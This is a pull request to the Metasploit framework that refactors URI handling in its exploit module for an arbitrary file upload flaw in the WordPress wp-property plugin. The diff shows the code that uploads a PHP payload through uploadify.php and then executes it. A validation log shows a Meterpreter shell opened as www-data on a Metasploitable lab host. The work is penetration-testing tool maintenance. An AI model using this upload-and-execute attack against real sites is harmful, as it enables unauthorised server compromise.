### PR TITLE
Use normalize_uri for module wp_property_upload_exec 

### DIFF
--- a/modules/exploits/unix/webapp/wp_property_upload_exec.rb
+++ b/modules/exploits/unix/webapp/wp_property_upload_exec.rb
@@ -54,11 +54,11 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    uri = normalize_uri(target_uri.path)
+    uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-property', 'third-party', 'uploadify', 'uploadify.php')
 
     res = send_request_cgi({
       'method' => 'GET',
-      'uri'    => "#{uri}/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
+      'uri'    => uri
     })
 
     if not res or res.code != 200
@@ -69,7 +69,8 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    uri = normalize_uri(target_uri.path)
+    data_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-property', 'third-party', 'uploadify/')
+    request_uri = normalize_uri(data_uri, 'uploadify.php')
 
     peer = "#{rhost}:#{rport}"
 
@@ -78,13 +79,13 @@ class Metasploit3 < Msf::Exploit::Remote
 
     data = Rex::MIME::Message.new
     data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
-    data.add_part("#{uri}/wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
+    data.add_part(data_uri, nil, nil, "form-data; name=\"folder\"")
     post_data = data.to_s
 
     print_status("#{peer} - Uploading payload #{@payload_name}")
     res = send_request_cgi({
       'method' => 'POST',
-      'uri'    => "#{uri}/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
+      'uri'    => request_uri,
       'ctype'  => "multipart/form-data; boundary=#{data.bound}",
       'data'   => post_data
     })

--- a/modules/exploits/unix/webapp/wp_property_upload_exec.rb
+++ b/modules/exploits/unix/webapp/wp_property_upload_exec.rb
@@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("#{peer} - Executing payload #{@payload_name}")
     res = send_request_raw({
       'uri'    => upload_uri,
-      'method'  => 'GET'
+      'method' => 'GET'
     })
 
     if res and res.code != 200

--- a/modules/exploits/unix/webapp/wp_property_upload_exec.rb
+++ b/modules/exploits/unix/webapp/wp_property_upload_exec.rb
@@ -54,12 +54,11 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    uri =  target_uri.path
-    uri << '/' if uri[-1,1] != '/'
+    uri = normalize_uri(target_uri.path)
 
     res = send_request_cgi({
       'method' => 'GET',
-      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
+      'uri'    => "#{uri}/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
     })
 
     if not res or res.code != 200
@@ -70,8 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    uri =  target_uri.path
-    uri << '/' if uri[-1,1] != '/'
+    uri = normalize_uri(target_uri.path)
 
     peer = "#{rhost}:#{rport}"
 
@@ -80,13 +78,13 @@ class Metasploit3 < Msf::Exploit::Remote
 
     data = Rex::MIME::Message.new
     data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
-    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
+    data.add_part("#{uri}/wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
     post_data = data.to_s
 
     print_status("#{peer} - Uploading payload #{@payload_name}")
     res = send_request_cgi({
       'method' => 'POST',
-      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
+      'uri'    => "#{uri}/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
       'ctype'  => "multipart/form-data; boundary=#{data.bound}",
       'data'   => post_data
     })
@@ -95,12 +93,16 @@ class Metasploit3 < Msf::Exploit::Remote
       fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
     end
 
-    upload_uri = res.body
+    upload_uri = normalize_uri(res.body)
 
     print_status("#{peer} - Executing payload #{@payload_name}")
     res = send_request_raw({
       'uri'    => upload_uri,
-      'method' => 'GET'
+      'method'  => 'GET'
     })
+
+    if res and res.code != 200
+        fail_with(Failure::UnexpectedReply, "#{peer} - Execution failed")
+    end
   end
 end


### PR DESCRIPTION
Older http/webapp exploits do not use the "normalize_uri" function, causing bad URIs to be generated that some servers don't like. For instance after installing wp_property in metasploitable2 the URI used doesn't have a leading / causing errors:

```
192.168.8.1 - - [27/Mar/2014:07:23:36 -0400] "GET wordpress/wp-content/plugins/wp-property/third-party/uploadify/mYfXH.php HTTP/1.1" 400 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
```
## Validation

```
msf exploit(wp_property_upload_exec) > rexploit
[*] Reloading module...

[*] 192.168.8.150:80 - Uploading payload AqAyX.php
[*] Started bind handler
[*] 192.168.8.150:80 - Executing payload AqAyX.php
[*] Sending stage (39848 bytes) to 192.168.8.150
[*] Meterpreter session 1 opened (192.168.8.1:60291 -> 192.168.8.150:4444) at 2014-03-27 05:21:31 -0700

^C[-] Exploit failed: Interrupt 

meterpreter > getuid
Server username: www-data (33)
meterpreter > pwd
/var/www/wordpress/wp-content/plugins/wp-property/third-party/uploadify
meterpreter > sysinfo
Computer    : metasploitable
OS          : Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
Meterpreter : php/php
meterpreter > meterpreter > 
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.8.150 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(wp_property_upload_exec) > exit
```
## Other Instances

A quick grep found many other similar instances but since I don't have all the apps to test I didn't touch them:

```
$ grep -r "if uri\[-1,1\] != '/'" *
linux/http/dolibarr_cmd_exec.rb:    uri << '/' if uri[-1,1] != '/'
linux/http/symantec_web_gateway_exec.rb:    uri << '/' if uri[-1,1] != '/'
linux/http/symantec_web_gateway_file_upload.rb:    uri << '/' if uri[-1,1] != '/'
linux/http/vcms_upload.rb:    uri << '/' if uri[-1,1] != '/'
linux/http/webid_converter.rb:    uri << '/' if uri[-1,1] != '/'
linux/http/webid_converter.rb:    uri << '/' if uri[-1,1] != '/'
multi/http/ajaxplorer_checkinstall_exec.rb:    uri << '/' if uri[-1,1] != '/'
multi/http/apprain_upload_exec.rb:    uri << '/' if uri[-1,1] != '/'
multi/http/auxilium_upload_exec.rb:    uri << '/' if uri[-1,1] != '/'
multi/http/mobilecartly_upload_exec.rb:    uri << '/' if uri[-1,1] != '/'
multi/http/mobilecartly_upload_exec.rb:    uri << '/' if uri[-1,1] != '/'
multi/http/phpldapadmin_query_engine.rb:    uri << '/' if uri[-1,1] != '/'
multi/http/phpscheduleit_start_date.rb:    uri << '/' if uri[-1,1] != '/'
multi/http/phpscheduleit_start_date.rb:    uri << '/' if uri[-1,1] != '/'
multi/http/phptax_exec.rb:    uri << '/' if uri[-1,1] != '/'
multi/http/qdpm_upload_exec.rb:    uri << '/' if uri[-1,1] != '/'
multi/http/qdpm_upload_exec.rb:    uri << '/' if uri[-1,1] != '/'
multi/http/sflog_upload_exec.rb:    uri << '/' if uri[-1,1] != '/'
multi/http/sflog_upload_exec.rb:    uri << '/' if uri[-1,1] != '/'
multi/http/sun_jsws_dav_options.rb:    uri << '/' if uri[-1,1] != '/'
multi/http/webpagetest_upload_exec.rb:    uri << '/' if uri[-1,1] != '/'
multi/http/webpagetest_upload_exec.rb:    uri << '/' if uri[-1,1] != '/'
unix/webapp/egallery_upload_exec.rb:    uri << '/' if uri[-1,1] != '/'
unix/webapp/joomla_tinybrowser.rb:    uri << '/' if uri[-1,1] != '/'
unix/webapp/narcissus_backend_exec.rb:    uri << '/' if uri[-1,1] != '/'
unix/webapp/php_wordpress_foxypress.rb:    uri << '/' if uri[-1,1] != '/'
unix/webapp/projectpier_upload_exec.rb:    uri << '/' if uri[-1,1] != '/'
unix/webapp/projectpier_upload_exec.rb:    uri << '/' if uri[-1,1] != '/'
unix/webapp/wp_advanced_custom_fields_exec.rb:    uri << '/' if uri[-1,1] != '/'
unix/webapp/wp_advanced_custom_fields_exec.rb:    uri << '/' if uri[-1,1] != '/'
unix/webapp/wp_advanced_custom_fields_exec.rb:    uri << '/' if uri[-1,1] != '/'
unix/webapp/wp_advanced_custom_fields_exec.rb:    uri << '/' if uri[-1,1] != '/'
unix/webapp/wp_asset_manager_upload_exec.rb:    uri << '/' if uri[-1,1] != '/'
unix/webapp/wp_google_document_embedder_exec.rb:    uri << '/' if uri[-1,1] != '/'
unix/webapp/wp_google_document_embedder_exec.rb:    uri << '/' if uri[-1,1] != '/'
unix/webapp/xoda_file_upload.rb:    uri << '/' if uri[-1,1] != '/'
unix/webapp/xoda_file_upload.rb:    uri << '/' if uri[-1,1] != '/'
windows/http/hp_sitescope_runomagentcommand.rb:    uri << '/' if uri[-1,1] != '/'
```
